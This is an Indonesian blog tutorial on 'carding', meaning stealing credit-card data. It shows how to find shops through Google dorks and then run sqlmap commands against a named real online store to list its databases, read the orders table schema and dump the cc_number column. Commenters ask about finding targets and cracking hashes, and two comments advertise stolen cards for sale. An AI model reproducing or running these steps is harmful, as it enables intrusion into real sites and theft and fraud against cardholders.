Monday, 18 May 2015

Tutorial Carding dengan SQL Map

Kali ini Nuenomaru akan menjelaskan dan mempraktekan Carding dengan SQL Map di Linux.
Untuk para pengguna Jendela alias Windows silahkan download dulu toolnya di google agar bisa dijalankan di Python.
Soalnya kali ini Nue akan menjelaskan nya di OS pinguin ;)
utk para pengguna linux silahkan merapat.

Pertama kita siapkan tools" nya dahulu :

1. sqlmap
2. dork carding ( bisa cari di google ) / download
untuk dorking di linux bisa mampir di thread ini dulu: Dorking Dengan BinGoo Di Linux


Pertama tama pastekan Dork di mbah Google.
cari web yang akan di jadikan Target.

Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
Nah, web tersebut error saat kita inject ,





Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap -u link --dbs
contoh: sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 --dbs

Disini kita mendapatkan 3 database :


[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap -u link -D namadatabase --tables 
( disini saya coba database "balboast_gkgcart" )

contoh: 
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables


nah, saya dapat tables nya :


Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap -u link -D namadatabase -T namatable --columns

contoh: 
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns

Maka akan muncul seperti ini : 


Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+

Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap -u link -D namadatabase -T namatable --dump

contoh : 
sqlmap -u http://www.balboastitch.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
semua proses sqlmap akan lama tergantung banyaknya database, tables , columns yang dimiliki web target.
ya jika kalian hanya ingin mau melihat pasword dan user admin web :v coba aja cari sendiri di databasenya :v yaa kalo yang udh masuk ke DB mengarah ke orders :v ya berarti lo lagi mo nyolong uangnya :p
untuk para pengguna windows silahkan download dan instal python,, lalu cari sqlmap.py :D
perintahnya sama aja kok.

Yosh semoga membantu ,, maaf jika masih banyak kekurangan ^_^
tapiii semogaaaa bermanfaat minnaaaa.



./Nuenomaru

Nuenomaru Just an illusion in Cyber World



Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2


14 comments

gan itu agan jalaninnya pake cmd kan?

maaf baru bales kak ^^
baru lihat notif komen di blog utk artikel ini *hehe trnyata ada yang komen..
gini kak, ini saya jalanin di live kali linux, jalanin ini tool lwt terminal di Linux.. tapi ada kok sql map yang di windows *search aja digoogle lbh lengkapnya.
nah kalo yg sql map utk di windows itu jalaninnya lwt CMD ..
sekian, semoga sukses..

Nuenomaru

gan.. cara cari link sasaran gimana??

pakai dork gans :D

Nuenomaru

Nda pake dihash kah mastah biasa nya kan masih nomer acak jadinya

di sqlmap ini dah ada fitur utk hashnya kok bang..
ya kalo sqlmapnya gak bisa ngedecrypt, silahkan cari utk fitur hash di google, atau pakai hash killer utk Linux

#Nuenomaru

http://forexwin77.blogspot.co.id/

om ko ane sekarang suka ada [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
kyk gitulah. gangerti T_T

https://github.com/sqlmapproject/sqlmap/issues/1513

#Nuenomaru

Itu kalau jalanin sql map windows sama ajakan sama yang os atau beda by:didikan bang michael

ini python versi berapa aja samakan ? (user windows)

Thanks for writing such a good article, I stumbled onto your blog and read a few post. I like your style of writing...
hacking forum

Yuk order cc us 70k. Masih fresh
Minat hubungi
Line:cardthis
Mail:manilucrot@gmail.com
Update 2 juni 2017

Jual CC hasil scam FRESH 100% ALL COUNTRY RANDOM Kami Sediakan CC dalam 1 Paket untuk segala Transaksi Online ( ORDER BARANG, TOP UP GAME ONLINE, PLAYSTORE GOOGLE, RESERVASI TIKET, DLL ) 1 Paket CC memiliki :
* 3 CREDIT CARD CARDING
* GARANSI GANTI CC BARU ATAU GARANSI UANG KEMBALI.
* Tersedia Testimoni yang TERPERCAYA 1000000000%
* cc Dijamin FRESH & WORK 1000000000%
* Metode/Tutorial yang Terupdate/Terbaru Dijamin ANTI CIDUK.

Cp : line : yoy2331


EmoticonEmoticon